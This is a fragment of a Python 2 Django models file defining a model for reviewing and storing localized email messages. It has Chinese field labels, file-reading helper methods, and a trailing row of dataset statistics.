('collect', u'网关'),
('relay', u'中继'),
)
class LocalizedMail(models.Model):
customer = models.ForeignKey(Customer, on_delete=models.DO_NOTHING, null=True, blank=True)
check_result = models.CharField(u'检测结果', max_length=20, null=True, blank=True, choices=CHECK_RESULT, db_index=True)
check_message = models.TextField(u'检测详细结果', null=True, blank=True)
created = models.DateTimeField(u'创建日期', auto_now_add=True)
mail_from = models.CharField(u'发件人', max_length=150, null=True, blank=True)
mail_to = models.CharField(u'收件人', max_length=150, null=True, blank=True)
subject = models.CharField(u'主题', max_length=800, null=True, blank=True)
state = models.CharField(u'状态', max_length=20, default='review', choices=MAIL_STATE, db_index=True)
size = models.IntegerField(u'邮件大小', default=0)
reviewer = models.ForeignKey(User, on_delete=models.DO_NOTHING, null=True, blank=True)
review_time = models.DateTimeField(u'审核时间', null=True, blank=True)
mail_id = models.CharField(u'客户邮件ID', max_length=20, null=True, blank=True)
origin = models.CharField(u'来源', max_length=20, choices=MAIL_ORIGIN, default='collect', db_index=True)
created_date = models.DateField(u'创建日期', auto_now_add=True, db_index=True)
def get_mail_content(self):
file_path = self.get_mail_path()
return open(file_path, 'r').read() if os.path.exists(file_path) else ''
def get_mail_path(self):
print os.path.join(settings.DATA_LOCALIZED_PATH, str(self.id))
return os.path.join(settings.DATA_LOCALIZED_PATH, str(self.id))
| 38.898305 | 119 | 0.67756 | 325 | 2,295 | 4.618462 | 0.375385 | 0.047968 | 0.077948 | 0.101932 | 0.229847 | 0.213191 | 0.187875 | 0.111925 | 0.111925 | 0.058628 | 0 | 0.009769 | 0.152505 | 2,295 | 58 | 120 | 39.568966 | 0.761954 | 0.005229 | 0 | 0.058824 | 0 | 0 | 0.138475 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0.039216 | 0.098039 | null | null | 0.019608 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.